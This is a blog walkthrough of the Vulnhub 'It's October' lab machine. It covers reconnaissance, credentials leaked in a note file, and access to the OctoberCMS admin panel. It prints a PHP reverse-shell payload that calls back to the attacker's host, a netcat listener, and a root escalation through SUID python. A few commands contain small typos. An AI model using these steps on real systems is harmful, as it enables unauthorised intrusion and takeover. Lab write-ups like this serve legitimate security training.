This time I’m doing It’s october from Vulnhub. After booting the VM I need to scan my subnet to find it’s address. I proceed with the usual nmap -n 192.168.56.101/24 to find out the box address.
After obtaining the address I run a more thorough scan with nmap -sV -sC 192.168.56.121 which highlight some interesting details:
As first step I decide to take a look at the webserver on port 80. The landing page is a well presented website, so I open the developer console to check the source to see if I can discover something more interesting. From the first look it doesn’t look like wordpress, but has to be some kind of CMS. The source reveals some interesting details, the theme used for this website is:
Press enter or click to view image in full size
vojtasvoboda-newageWhich after a quick google search reveals to be a theme for OctoberCMS. At this point I backtracked to the other exposed webserver on port 8080 which just exposes a notepad image:
Press enter or click to view image in full size
But the developer tools reveals a more interesting find, there is a link commented out to /mynote.txt which upon visiting, leaks us some credentials:
At this point I attempt to use the credentials to connect via ssh to the machine, but apparently it is not that easy and I get greeted by a permission denied error:
Press enter or click to view image in full size
My next guess is to try to access the mysql service running remotely to create a backdoor via OUTFILE , but even this attempt failed as it seems that the ip
is blacklisted after the first attempt of connection. The only option
left now is then to check how to access the admin panel of OctoberCMS
and see if the credentials would work there.
Get Valentino Losito’s stories in your inbox
Join Medium for free to get updates from this writer.
Via the CMS documentation I learn that /backend/backend/auth/signin
is the way to go and finally success, the credentials let me in. At
this point my priority is to explore the admin panel to find a way of
executing some code to get a shell on the server. The CMS tab seems to
suite the purpose, it allows me to create a page with the browser
editor:
Press enter or click to view image in full size
Nice! Now accordingly to the documentation I can just write a small payload that on opening of the /reverse page will give me a reverse shell:
function onStart() {
$sock=fsockopen(“192.168.56.101”,5555);$proc=proc_open(“/bin/sh -i”, array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);
}Press enter or click to view image in full size
Now all there is left to do is open a listener on my attacking machine with nc -lvp 5555 and visit 192.168.56.121/redirect . Upon receiving a connection I update the shell with python3 -c "import pty;pty.spawn('/bin/bash)" , at this point we just need to find a way to escalate the privileges.
I check sudo -l for some low hanging fruit but www-data cannot access sudo , my next step then is to check if there is any interesting binary with SUID . So I run find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \; which reveal:
Press enter or click to view image in full size
Really interesting, python is running with SUID enabled, we can exploit that with a sightly variation of the command that we used to upgrade the shell to obtain a root shell.
python3 -c "import os;import pty; os.setuid(0); pty.spawn('/bin/bash')"Where before running the shell we set the process to run as root which brings me to the end of this challenge:
Thanks to the creator of this challenge, was easy but enjoyable. If you want to try it yourself here is the link